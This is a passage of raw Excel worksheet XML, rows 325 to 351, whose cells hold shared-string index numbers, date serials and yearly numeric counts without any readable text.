    <row r="325" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A325" t="s">
        <v>4</v>
      </c>
      <c r="B325">
        <v>44420.714931215276</v>
      </c>
      <c r="C325" t="s">
        <v>3065</v>
      </c>
      <c r="D325">
        <v>102</v>
      </c>
      <c r="E325" t="s">
        <v>3066</v>
      </c>
      <c r="F325">
        <v>102</v>
      </c>
      <c r="G325" t="s">
        <v>3067</v>
      </c>
      <c r="H325" t="s">
        <v>3068</v>
      </c>
      <c r="I325" t="s">
        <v>82</v>
      </c>
      <c r="J325" t="s">
        <v>43</v>
      </c>
      <c r="K325" t="s">
        <v>24</v>
      </c>
      <c r="L325" t="s">
        <v>83</v>
      </c>
      <c r="M325" t="s">
        <v>72</v>
      </c>
      <c r="O325" t="s">
        <v>111</v>
      </c>
      <c r="Q325" t="s">
        <v>3568</v>
      </c>
      <c r="R325">
        <v>2558</v>
      </c>
      <c r="S325">
        <v>2634</v>
      </c>
      <c r="T325">
        <v>1930</v>
      </c>
      <c r="U325">
        <v>2011</v>
      </c>
      <c r="V325">
        <v>2027</v>
      </c>
      <c r="W325" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="326" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A326" t="s">
        <v>4</v>
      </c>
      <c r="B326">
        <v>44119.703438611112</v>
      </c>
      <c r="C326" t="s">
        <v>3075</v>
      </c>
      <c r="D326">
        <v>101</v>
      </c>
      <c r="E326" t="s">
        <v>3076</v>
      </c>
      <c r="F326">
        <v>101</v>
      </c>
      <c r="G326" t="s">
        <v>3077</v>
      </c>
      <c r="H326" t="s">
        <v>3078</v>
      </c>
      <c r="I326" t="s">
        <v>156</v>
      </c>
      <c r="J326" t="s">
        <v>226</v>
      </c>
      <c r="K326" t="s">
        <v>27</v>
      </c>
      <c r="L326" t="s">
        <v>77</v>
      </c>
      <c r="M326" t="s">
        <v>308</v>
      </c>
      <c r="N326" t="s">
        <v>309</v>
      </c>
      <c r="O326" t="s">
        <v>3079</v>
      </c>
      <c r="Q326" t="s">
        <v>3080</v>
      </c>
      <c r="S326">
        <v>2</v>
      </c>
      <c r="T326">
        <v>1</v>
      </c>
      <c r="W326" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="327" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A327" t="s">
        <v>4</v>
      </c>
      <c r="B327">
        <v>44063.692973888887</v>
      </c>
      <c r="C327" t="s">
        <v>3081</v>
      </c>
      <c r="D327">
        <v>100</v>
      </c>
      <c r="E327" t="s">
        <v>3082</v>
      </c>
      <c r="F327">
        <v>100</v>
      </c>
      <c r="G327" t="s">
        <v>3083</v>
      </c>
      <c r="H327" t="s">
        <v>3084</v>
      </c>
      <c r="I327" t="s">
        <v>185</v>
      </c>
      <c r="J327" t="s">
        <v>186</v>
      </c>
      <c r="K327" t="s">
        <v>16</v>
      </c>
      <c r="L327" t="s">
        <v>83</v>
      </c>
      <c r="M327" t="s">
        <v>72</v>
      </c>
      <c r="O327" t="s">
        <v>2176</v>
      </c>
      <c r="Q327" t="s">
        <v>3610</v>
      </c>
      <c r="R327">
        <v>103245</v>
      </c>
      <c r="S327">
        <v>90069</v>
      </c>
      <c r="T327">
        <v>84307</v>
      </c>
      <c r="U327">
        <v>94873</v>
      </c>
      <c r="V327">
        <v>120539</v>
      </c>
      <c r="W327" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="328" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A328" t="s">
        <v>4</v>
      </c>
      <c r="B328">
        <v>44603.453514780093</v>
      </c>
      <c r="C328" t="s">
        <v>3090</v>
      </c>
      <c r="D328">
        <v>130</v>
      </c>
      <c r="E328" t="s">
        <v>3091</v>
      </c>
      <c r="F328">
        <v>104</v>
      </c>
      <c r="G328" t="s">
        <v>2376</v>
      </c>
      <c r="H328" t="s">
        <v>3092</v>
      </c>
      <c r="I328" t="s">
        <v>31</v>
      </c>
      <c r="J328" t="s">
        <v>262</v>
      </c>
      <c r="K328" t="s">
        <v>31</v>
      </c>
      <c r="L328" t="s">
        <v>77</v>
      </c>
      <c r="M328" t="s">
        <v>262</v>
      </c>
      <c r="N328" t="s">
        <v>263</v>
      </c>
      <c r="Q328" t="s">
        <v>3611</v>
      </c>
      <c r="R328">
        <v>175315</v>
      </c>
      <c r="S328">
        <v>264901</v>
      </c>
      <c r="T328">
        <v>292700</v>
      </c>
      <c r="U328">
        <v>308208</v>
      </c>
      <c r="V328">
        <v>396773</v>
      </c>
      <c r="W328" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="329" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A329" t="s">
        <v>4</v>
      </c>
      <c r="B329">
        <v>44648.575936493056</v>
      </c>
      <c r="C329" t="s">
        <v>3090</v>
      </c>
      <c r="D329">
        <v>130</v>
      </c>
      <c r="E329" t="s">
        <v>3094</v>
      </c>
      <c r="F329">
        <v>120</v>
      </c>
      <c r="G329" t="s">
        <v>3095</v>
      </c>
      <c r="H329" t="s">
        <v>3096</v>
      </c>
      <c r="I329" t="s">
        <v>31</v>
      </c>
      <c r="J329" t="s">
        <v>262</v>
      </c>
      <c r="K329" t="s">
        <v>31</v>
      </c>
      <c r="L329" t="s">
        <v>77</v>
      </c>
      <c r="M329" t="s">
        <v>262</v>
      </c>
      <c r="N329" t="s">
        <v>263</v>
      </c>
      <c r="Q329" t="s">
        <v>3611</v>
      </c>
      <c r="S329">
        <v>4</v>
      </c>
      <c r="W329" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="330" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A330" t="s">
        <v>4</v>
      </c>
      <c r="B330">
        <v>44426.747029513892</v>
      </c>
      <c r="C330" t="s">
        <v>3354</v>
      </c>
      <c r="D330">
        <v>112</v>
      </c>
      <c r="E330" t="s">
        <v>3355</v>
      </c>
      <c r="F330">
        <v>112</v>
      </c>
      <c r="G330" t="s">
        <v>3356</v>
      </c>
      <c r="H330" t="s">
        <v>3357</v>
      </c>
      <c r="I330" t="s">
        <v>268</v>
      </c>
      <c r="J330" t="s">
        <v>269</v>
      </c>
      <c r="K330" t="s">
        <v>10</v>
      </c>
      <c r="L330" t="s">
        <v>77</v>
      </c>
      <c r="M330" t="s">
        <v>270</v>
      </c>
      <c r="N330" t="s">
        <v>271</v>
      </c>
      <c r="Q330" t="s">
        <v>3612</v>
      </c>
      <c r="T330">
        <v>11</v>
      </c>
      <c r="U330">
        <v>5</v>
      </c>
      <c r="V330">
        <v>74</v>
      </c>
      <c r="W330" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="331" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A331" t="s">
        <v>4</v>
      </c>
      <c r="B331">
        <v>44669.59422334491</v>
      </c>
      <c r="C331" t="s">
        <v>3359</v>
      </c>
      <c r="D331">
        <v>111</v>
      </c>
      <c r="E331" t="s">
        <v>3360</v>
      </c>
      <c r="F331">
        <v>100</v>
      </c>
      <c r="G331" t="s">
        <v>3361</v>
      </c>
      <c r="H331" t="s">
        <v>3362</v>
      </c>
      <c r="I331" t="s">
        <v>268</v>
      </c>
      <c r="J331" t="s">
        <v>269</v>
      </c>
      <c r="K331" t="s">
        <v>10</v>
      </c>
      <c r="L331" t="s">
        <v>77</v>
      </c>
      <c r="M331" t="s">
        <v>270</v>
      </c>
      <c r="N331" t="s">
        <v>271</v>
      </c>
      <c r="Q331" t="s">
        <v>3613</v>
      </c>
      <c r="W331" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="332" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A332" t="s">
        <v>4</v>
      </c>
      <c r="B332">
        <v>44536.916149328703</v>
      </c>
      <c r="C332" t="s">
        <v>3359</v>
      </c>
      <c r="D332">
        <v>111</v>
      </c>
      <c r="E332" t="s">
        <v>3364</v>
      </c>
      <c r="F332">
        <v>111</v>
      </c>
      <c r="G332" t="s">
        <v>3365</v>
      </c>
      <c r="H332" t="s">
        <v>3366</v>
      </c>
      <c r="I332" t="s">
        <v>268</v>
      </c>
      <c r="J332" t="s">
        <v>269</v>
      </c>
      <c r="K332" t="s">
        <v>10</v>
      </c>
      <c r="L332" t="s">
        <v>77</v>
      </c>
      <c r="M332" t="s">
        <v>270</v>
      </c>
      <c r="N332" t="s">
        <v>271</v>
      </c>
      <c r="Q332" t="s">
        <v>3613</v>
      </c>
      <c r="S332">
        <v>44</v>
      </c>
      <c r="V332">
        <v>24</v>
      </c>
      <c r="W332" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="333" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A333" t="s">
        <v>4</v>
      </c>
      <c r="B333">
        <v>44082.689054016206</v>
      </c>
      <c r="C333" t="s">
        <v>3367</v>
      </c>
      <c r="D333">
        <v>101</v>
      </c>
      <c r="E333" t="s">
        <v>3368</v>
      </c>
      <c r="F333">
        <v>101</v>
      </c>
      <c r="G333" t="s">
        <v>3369</v>
      </c>
      <c r="H333" t="s">
        <v>3346</v>
      </c>
      <c r="I333" t="s">
        <v>185</v>
      </c>
      <c r="J333" t="s">
        <v>186</v>
      </c>
      <c r="K333" t="s">
        <v>16</v>
      </c>
      <c r="L333" t="s">
        <v>83</v>
      </c>
      <c r="M333" t="s">
        <v>72</v>
      </c>
      <c r="O333" t="s">
        <v>2601</v>
      </c>
      <c r="P333" t="s">
        <v>1795</v>
      </c>
      <c r="Q333" t="s">
        <v>3614</v>
      </c>
      <c r="R333">
        <v>29020</v>
      </c>
      <c r="S333">
        <v>35802</v>
      </c>
      <c r="T333">
        <v>42135</v>
      </c>
      <c r="U333">
        <v>42716</v>
      </c>
      <c r="V333">
        <v>48721</v>
      </c>
      <c r="W333" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="334" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A334" t="s">
        <v>4</v>
      </c>
      <c r="B334">
        <v>44411.636757743057</v>
      </c>
      <c r="C334" t="s">
        <v>3385</v>
      </c>
      <c r="D334">
        <v>100</v>
      </c>
      <c r="E334" t="s">
        <v>3386</v>
      </c>
      <c r="F334">
        <v>100</v>
      </c>
      <c r="G334" t="s">
        <v>3387</v>
      </c>
      <c r="H334" t="s">
        <v>3388</v>
      </c>
      <c r="I334" t="s">
        <v>185</v>
      </c>
      <c r="J334" t="s">
        <v>542</v>
      </c>
      <c r="K334" t="s">
        <v>16</v>
      </c>
      <c r="L334" t="s">
        <v>83</v>
      </c>
      <c r="M334" t="s">
        <v>72</v>
      </c>
      <c r="O334" t="s">
        <v>3389</v>
      </c>
      <c r="Q334" t="s">
        <v>3615</v>
      </c>
      <c r="T334">
        <v>1</v>
      </c>
      <c r="V334">
        <v>36</v>
      </c>
      <c r="W334" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="335" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A335" t="s">
        <v>4</v>
      </c>
      <c r="B335">
        <v>44685.547926840278</v>
      </c>
      <c r="C335" t="s">
        <v>3391</v>
      </c>
      <c r="D335">
        <v>101</v>
      </c>
      <c r="E335" t="s">
        <v>3392</v>
      </c>
      <c r="F335">
        <v>101</v>
      </c>
      <c r="G335" t="s">
        <v>3393</v>
      </c>
      <c r="H335" t="s">
        <v>3388</v>
      </c>
      <c r="I335" t="s">
        <v>185</v>
      </c>
      <c r="J335" t="s">
        <v>542</v>
      </c>
      <c r="K335" t="s">
        <v>16</v>
      </c>
      <c r="L335" t="s">
        <v>83</v>
      </c>
      <c r="M335" t="s">
        <v>72</v>
      </c>
      <c r="Q335" t="s">
        <v>3394</v>
      </c>
      <c r="V335">
        <v>45</v>
      </c>
      <c r="W335" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="336" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A336" t="s">
        <v>4</v>
      </c>
      <c r="B336">
        <v>44025.550737395832</v>
      </c>
      <c r="C336" t="s">
        <v>3395</v>
      </c>
      <c r="D336">
        <v>203</v>
      </c>
      <c r="E336" t="s">
        <v>3396</v>
      </c>
      <c r="F336">
        <v>202</v>
      </c>
      <c r="G336" t="s">
        <v>3397</v>
      </c>
      <c r="H336" t="s">
        <v>3398</v>
      </c>
      <c r="I336" t="s">
        <v>268</v>
      </c>
      <c r="J336" t="s">
        <v>269</v>
      </c>
      <c r="K336" t="s">
        <v>10</v>
      </c>
      <c r="L336" t="s">
        <v>77</v>
      </c>
      <c r="M336" t="s">
        <v>1766</v>
      </c>
      <c r="N336" t="s">
        <v>1767</v>
      </c>
      <c r="Q336" t="s">
        <v>3399</v>
      </c>
      <c r="R336">
        <v>3143578</v>
      </c>
      <c r="S336">
        <v>2956400</v>
      </c>
      <c r="T336">
        <v>2865356</v>
      </c>
      <c r="U336">
        <v>3160069</v>
      </c>
      <c r="V336">
        <v>3697353</v>
      </c>
      <c r="W336" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="337" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A337" t="s">
        <v>4</v>
      </c>
      <c r="B337">
        <v>44252.944052418985</v>
      </c>
      <c r="C337" t="s">
        <v>3395</v>
      </c>
      <c r="D337">
        <v>301</v>
      </c>
      <c r="E337" t="s">
        <v>3396</v>
      </c>
      <c r="F337">
        <v>301</v>
      </c>
      <c r="G337" t="s">
        <v>3397</v>
      </c>
      <c r="H337" t="s">
        <v>3398</v>
      </c>
      <c r="I337" t="s">
        <v>268</v>
      </c>
      <c r="J337" t="s">
        <v>269</v>
      </c>
      <c r="K337" t="s">
        <v>10</v>
      </c>
      <c r="L337" t="s">
        <v>77</v>
      </c>
      <c r="M337" t="s">
        <v>1766</v>
      </c>
      <c r="N337" t="s">
        <v>1767</v>
      </c>
      <c r="Q337" t="s">
        <v>3616</v>
      </c>
      <c r="R337">
        <v>3143578</v>
      </c>
      <c r="S337">
        <v>2956400</v>
      </c>
      <c r="T337">
        <v>2865356</v>
      </c>
      <c r="U337">
        <v>3160069</v>
      </c>
      <c r="V337">
        <v>3697353</v>
      </c>
      <c r="W337" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="338" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A338" t="s">
        <v>4</v>
      </c>
      <c r="B338">
        <v>44448.04261384259</v>
      </c>
      <c r="C338" t="s">
        <v>3395</v>
      </c>
      <c r="D338">
        <v>100</v>
      </c>
      <c r="E338" t="s">
        <v>3396</v>
      </c>
      <c r="F338">
        <v>100</v>
      </c>
      <c r="G338" t="s">
        <v>3397</v>
      </c>
      <c r="H338" t="s">
        <v>3398</v>
      </c>
      <c r="I338" t="s">
        <v>268</v>
      </c>
      <c r="J338" t="s">
        <v>269</v>
      </c>
      <c r="K338" t="s">
        <v>10</v>
      </c>
      <c r="L338" t="s">
        <v>77</v>
      </c>
      <c r="M338" t="s">
        <v>1766</v>
      </c>
      <c r="N338" t="s">
        <v>1767</v>
      </c>
      <c r="Q338" t="s">
        <v>161</v>
      </c>
      <c r="R338">
        <v>3143578</v>
      </c>
      <c r="S338">
        <v>2956400</v>
      </c>
      <c r="T338">
        <v>2865356</v>
      </c>
      <c r="U338">
        <v>3160069</v>
      </c>
      <c r="V338">
        <v>3697353</v>
      </c>
      <c r="W338" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="339" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A339" t="s">
        <v>4</v>
      </c>
      <c r="B339">
        <v>44642.661433657406</v>
      </c>
      <c r="C339" t="s">
        <v>3395</v>
      </c>
      <c r="D339">
        <v>202</v>
      </c>
      <c r="E339" t="s">
        <v>3396</v>
      </c>
      <c r="F339">
        <v>201</v>
      </c>
      <c r="G339" t="s">
        <v>3397</v>
      </c>
      <c r="H339" t="s">
        <v>3401</v>
      </c>
      <c r="I339" t="s">
        <v>268</v>
      </c>
      <c r="J339" t="s">
        <v>269</v>
      </c>
      <c r="K339" t="s">
        <v>10</v>
      </c>
      <c r="L339" t="s">
        <v>77</v>
      </c>
      <c r="M339" t="s">
        <v>1766</v>
      </c>
      <c r="N339" t="s">
        <v>1767</v>
      </c>
      <c r="Q339" t="s">
        <v>161</v>
      </c>
      <c r="R339">
        <v>3143578</v>
      </c>
      <c r="S339">
        <v>2956400</v>
      </c>
      <c r="T339">
        <v>2865356</v>
      </c>
      <c r="U339">
        <v>3160069</v>
      </c>
      <c r="V339">
        <v>3697353</v>
      </c>
      <c r="W339" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="340" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A340" t="s">
        <v>4</v>
      </c>
      <c r="B340">
        <v>44449.626449537034</v>
      </c>
      <c r="C340" t="s">
        <v>3422</v>
      </c>
      <c r="D340">
        <v>101</v>
      </c>
      <c r="E340" t="s">
        <v>3423</v>
      </c>
      <c r="F340">
        <v>101</v>
      </c>
      <c r="G340" t="s">
        <v>3424</v>
      </c>
      <c r="H340" t="s">
        <v>3425</v>
      </c>
      <c r="I340" t="s">
        <v>82</v>
      </c>
      <c r="J340" t="s">
        <v>32</v>
      </c>
      <c r="K340" t="s">
        <v>32</v>
      </c>
      <c r="L340" t="s">
        <v>83</v>
      </c>
      <c r="M340" t="s">
        <v>72</v>
      </c>
      <c r="O340" t="s">
        <v>111</v>
      </c>
      <c r="Q340" t="s">
        <v>161</v>
      </c>
      <c r="W340" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="341" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A341" t="s">
        <v>4</v>
      </c>
      <c r="B341">
        <v>44558.744427129626</v>
      </c>
      <c r="C341" t="s">
        <v>3445</v>
      </c>
      <c r="D341">
        <v>100</v>
      </c>
      <c r="E341" t="s">
        <v>3446</v>
      </c>
      <c r="F341">
        <v>100</v>
      </c>
      <c r="G341" t="s">
        <v>3447</v>
      </c>
      <c r="H341" t="s">
        <v>3448</v>
      </c>
      <c r="I341" t="s">
        <v>31</v>
      </c>
      <c r="J341" t="s">
        <v>262</v>
      </c>
      <c r="K341" t="s">
        <v>31</v>
      </c>
      <c r="L341" t="s">
        <v>77</v>
      </c>
      <c r="M341" t="s">
        <v>262</v>
      </c>
      <c r="N341" t="s">
        <v>263</v>
      </c>
      <c r="Q341" t="s">
        <v>3617</v>
      </c>
      <c r="R341">
        <v>104</v>
      </c>
      <c r="S341">
        <v>7159</v>
      </c>
      <c r="T341">
        <v>7318</v>
      </c>
      <c r="U341">
        <v>6270</v>
      </c>
      <c r="V341">
        <v>10197</v>
      </c>
      <c r="W341" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="342" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A342" t="s">
        <v>4</v>
      </c>
      <c r="B342">
        <v>44629.688684039349</v>
      </c>
      <c r="C342" t="s">
        <v>3457</v>
      </c>
      <c r="D342">
        <v>201</v>
      </c>
      <c r="E342" t="s">
        <v>3458</v>
      </c>
      <c r="F342">
        <v>201</v>
      </c>
      <c r="G342" t="s">
        <v>3459</v>
      </c>
      <c r="H342" t="s">
        <v>3216</v>
      </c>
      <c r="I342" t="s">
        <v>156</v>
      </c>
      <c r="J342" t="s">
        <v>157</v>
      </c>
      <c r="K342" t="s">
        <v>26</v>
      </c>
      <c r="L342" t="s">
        <v>77</v>
      </c>
      <c r="M342" t="s">
        <v>475</v>
      </c>
      <c r="N342" t="s">
        <v>476</v>
      </c>
      <c r="Q342" t="s">
        <v>1325</v>
      </c>
      <c r="R342">
        <v>23</v>
      </c>
      <c r="S342">
        <v>66</v>
      </c>
      <c r="T342">
        <v>49</v>
      </c>
      <c r="U342">
        <v>9</v>
      </c>
      <c r="V342">
        <v>6</v>
      </c>
      <c r="W342" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="343" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A343" t="s">
        <v>4</v>
      </c>
      <c r="B343">
        <v>44629.696740081017</v>
      </c>
      <c r="C343" t="s">
        <v>3460</v>
      </c>
      <c r="D343">
        <v>200</v>
      </c>
      <c r="E343" t="s">
        <v>3461</v>
      </c>
      <c r="F343">
        <v>200</v>
      </c>
      <c r="G343" t="s">
        <v>3462</v>
      </c>
      <c r="H343" t="s">
        <v>3463</v>
      </c>
      <c r="I343" t="s">
        <v>156</v>
      </c>
      <c r="J343" t="s">
        <v>157</v>
      </c>
      <c r="K343" t="s">
        <v>26</v>
      </c>
      <c r="L343" t="s">
        <v>77</v>
      </c>
      <c r="M343" t="s">
        <v>475</v>
      </c>
      <c r="N343" t="s">
        <v>476</v>
      </c>
      <c r="Q343" t="s">
        <v>1325</v>
      </c>
      <c r="R343">
        <v>12</v>
      </c>
      <c r="S343">
        <v>44</v>
      </c>
      <c r="T343">
        <v>259</v>
      </c>
      <c r="U343">
        <v>205</v>
      </c>
      <c r="V343">
        <v>178</v>
      </c>
      <c r="W343" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="344" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A344" t="s">
        <v>4</v>
      </c>
      <c r="B344">
        <v>44519.444953668979</v>
      </c>
      <c r="C344" t="s">
        <v>3460</v>
      </c>
      <c r="D344">
        <v>201</v>
      </c>
      <c r="E344" t="s">
        <v>3461</v>
      </c>
      <c r="F344">
        <v>201</v>
      </c>
      <c r="G344" t="s">
        <v>3462</v>
      </c>
      <c r="H344" t="s">
        <v>3463</v>
      </c>
      <c r="I344" t="s">
        <v>156</v>
      </c>
      <c r="J344" t="s">
        <v>157</v>
      </c>
      <c r="K344" t="s">
        <v>26</v>
      </c>
      <c r="L344" t="s">
        <v>77</v>
      </c>
      <c r="M344" t="s">
        <v>475</v>
      </c>
      <c r="N344" t="s">
        <v>476</v>
      </c>
      <c r="Q344" t="s">
        <v>161</v>
      </c>
      <c r="R344">
        <v>12</v>
      </c>
      <c r="S344">
        <v>44</v>
      </c>
      <c r="T344">
        <v>259</v>
      </c>
      <c r="U344">
        <v>205</v>
      </c>
      <c r="V344">
        <v>178</v>
      </c>
      <c r="W344" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="345" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A345" t="s">
        <v>4</v>
      </c>
      <c r="B345">
        <v>44629.696740092593</v>
      </c>
      <c r="C345" t="s">
        <v>3460</v>
      </c>
      <c r="D345">
        <v>200</v>
      </c>
      <c r="E345" t="s">
        <v>3464</v>
      </c>
      <c r="F345">
        <v>200</v>
      </c>
      <c r="G345" t="s">
        <v>3465</v>
      </c>
      <c r="H345" t="s">
        <v>3220</v>
      </c>
      <c r="I345" t="s">
        <v>156</v>
      </c>
      <c r="J345" t="s">
        <v>157</v>
      </c>
      <c r="K345" t="s">
        <v>26</v>
      </c>
      <c r="L345" t="s">
        <v>77</v>
      </c>
      <c r="M345" t="s">
        <v>475</v>
      </c>
      <c r="N345" t="s">
        <v>476</v>
      </c>
      <c r="Q345" t="s">
        <v>1325</v>
      </c>
      <c r="R345">
        <v>2</v>
      </c>
      <c r="S345">
        <v>24</v>
      </c>
      <c r="T345">
        <v>77</v>
      </c>
      <c r="U345">
        <v>48</v>
      </c>
      <c r="V345">
        <v>73</v>
      </c>
      <c r="W345" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="346" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A346" t="s">
        <v>4</v>
      </c>
      <c r="B346">
        <v>44519.444953692131</v>
      </c>
      <c r="C346" t="s">
        <v>3460</v>
      </c>
      <c r="D346">
        <v>201</v>
      </c>
      <c r="E346" t="s">
        <v>3464</v>
      </c>
      <c r="F346">
        <v>201</v>
      </c>
      <c r="G346" t="s">
        <v>3465</v>
      </c>
      <c r="H346" t="s">
        <v>3220</v>
      </c>
      <c r="I346" t="s">
        <v>156</v>
      </c>
      <c r="J346" t="s">
        <v>157</v>
      </c>
      <c r="K346" t="s">
        <v>26</v>
      </c>
      <c r="L346" t="s">
        <v>77</v>
      </c>
      <c r="M346" t="s">
        <v>475</v>
      </c>
      <c r="N346" t="s">
        <v>476</v>
      </c>
      <c r="Q346" t="s">
        <v>161</v>
      </c>
      <c r="R346">
        <v>2</v>
      </c>
      <c r="S346">
        <v>24</v>
      </c>
      <c r="T346">
        <v>77</v>
      </c>
      <c r="U346">
        <v>48</v>
      </c>
      <c r="V346">
        <v>73</v>
      </c>
      <c r="W346" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="347" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A347" t="s">
        <v>4</v>
      </c>
      <c r="B347">
        <v>44629.696740092593</v>
      </c>
      <c r="C347" t="s">
        <v>3460</v>
      </c>
      <c r="D347">
        <v>200</v>
      </c>
      <c r="E347" t="s">
        <v>3466</v>
      </c>
      <c r="F347">
        <v>200</v>
      </c>
      <c r="G347" t="s">
        <v>3467</v>
      </c>
      <c r="H347" t="s">
        <v>3226</v>
      </c>
      <c r="I347" t="s">
        <v>156</v>
      </c>
      <c r="J347" t="s">
        <v>157</v>
      </c>
      <c r="K347" t="s">
        <v>26</v>
      </c>
      <c r="L347" t="s">
        <v>77</v>
      </c>
      <c r="M347" t="s">
        <v>475</v>
      </c>
      <c r="N347" t="s">
        <v>476</v>
      </c>
      <c r="Q347" t="s">
        <v>1325</v>
      </c>
      <c r="R347">
        <v>2</v>
      </c>
      <c r="S347">
        <v>22</v>
      </c>
      <c r="T347">
        <v>207</v>
      </c>
      <c r="U347">
        <v>203</v>
      </c>
      <c r="V347">
        <v>178</v>
      </c>
      <c r="W347" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="348" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A348" t="s">
        <v>4</v>
      </c>
      <c r="B348">
        <v>44519.444953726852</v>
      </c>
      <c r="C348" t="s">
        <v>3460</v>
      </c>
      <c r="D348">
        <v>201</v>
      </c>
      <c r="E348" t="s">
        <v>3466</v>
      </c>
      <c r="F348">
        <v>201</v>
      </c>
      <c r="G348" t="s">
        <v>3467</v>
      </c>
      <c r="H348" t="s">
        <v>3226</v>
      </c>
      <c r="I348" t="s">
        <v>156</v>
      </c>
      <c r="J348" t="s">
        <v>157</v>
      </c>
      <c r="K348" t="s">
        <v>26</v>
      </c>
      <c r="L348" t="s">
        <v>77</v>
      </c>
      <c r="M348" t="s">
        <v>475</v>
      </c>
      <c r="N348" t="s">
        <v>476</v>
      </c>
      <c r="Q348" t="s">
        <v>161</v>
      </c>
      <c r="R348">
        <v>2</v>
      </c>
      <c r="S348">
        <v>22</v>
      </c>
      <c r="T348">
        <v>207</v>
      </c>
      <c r="U348">
        <v>203</v>
      </c>
      <c r="V348">
        <v>178</v>
      </c>
      <c r="W348" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="349" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A349" t="s">
        <v>4</v>
      </c>
      <c r="B349">
        <v>44519.444953749997</v>
      </c>
      <c r="C349" t="s">
        <v>3460</v>
      </c>
      <c r="D349">
        <v>200</v>
      </c>
      <c r="E349" t="s">
        <v>3468</v>
      </c>
      <c r="F349">
        <v>200</v>
      </c>
      <c r="G349" t="s">
        <v>3469</v>
      </c>
      <c r="H349" t="s">
        <v>3470</v>
      </c>
      <c r="I349" t="s">
        <v>156</v>
      </c>
      <c r="J349" t="s">
        <v>157</v>
      </c>
      <c r="K349" t="s">
        <v>26</v>
      </c>
      <c r="L349" t="s">
        <v>77</v>
      </c>
      <c r="M349" t="s">
        <v>475</v>
      </c>
      <c r="N349" t="s">
        <v>476</v>
      </c>
      <c r="Q349" t="s">
        <v>1325</v>
      </c>
      <c r="R349">
        <v>1</v>
      </c>
      <c r="S349">
        <v>14</v>
      </c>
      <c r="T349">
        <v>17</v>
      </c>
      <c r="U349">
        <v>9</v>
      </c>
      <c r="V349">
        <v>17</v>
      </c>
      <c r="W349" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="350" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A350" t="s">
        <v>4</v>
      </c>
      <c r="B350">
        <v>44629.696740104169</v>
      </c>
      <c r="C350" t="s">
        <v>3460</v>
      </c>
      <c r="D350">
        <v>201</v>
      </c>
      <c r="E350" t="s">
        <v>3468</v>
      </c>
      <c r="F350">
        <v>201</v>
      </c>
      <c r="G350" t="s">
        <v>3469</v>
      </c>
      <c r="H350" t="s">
        <v>3470</v>
      </c>
      <c r="I350" t="s">
        <v>156</v>
      </c>
      <c r="J350" t="s">
        <v>157</v>
      </c>
      <c r="K350" t="s">
        <v>26</v>
      </c>
      <c r="L350" t="s">
        <v>77</v>
      </c>
      <c r="M350" t="s">
        <v>475</v>
      </c>
      <c r="N350" t="s">
        <v>476</v>
      </c>
      <c r="Q350" t="s">
        <v>161</v>
      </c>
      <c r="R350">
        <v>1</v>
      </c>
      <c r="S350">
        <v>14</v>
      </c>
      <c r="T350">
        <v>17</v>
      </c>
      <c r="U350">
        <v>9</v>
      </c>
      <c r="V350">
        <v>17</v>
      </c>
      <c r="W350" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="351" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A351" t="s">
        <v>4</v>
      </c>
      <c r="B351">
        <v>44519.444953773149</v>
      </c>
      <c r="C351" t="s">
        <v>3460</v>
      </c>
      <c r="D351">
        <v>200</v>
      </c>
      <c r="E351" t="s">
        <v>3471</v>
      </c>
      <c r="F351">
        <v>200</v>
      </c>
      <c r="G351" t="s">
        <v>3472</v>
      </c>
      <c r="H351" t="s">
        <v>3473</v>
      </c>
      <c r="I351" t="s">
        <v>156</v>
      </c>
      <c r="J351" t="s">
        <v>157</v>
      </c>
      <c r="K351" t="s">
        <v>26</v>
      </c>
      <c r="L351" t="s">
        <v>77</v>
      </c>
      <c r="M351" t="s">
        <v>475</v>
      </c>
      <c r="N351" t="s">
        <v>476</v>
      </c>
      <c r="Q351" t="s">
        <v>1325</v>
      </c>
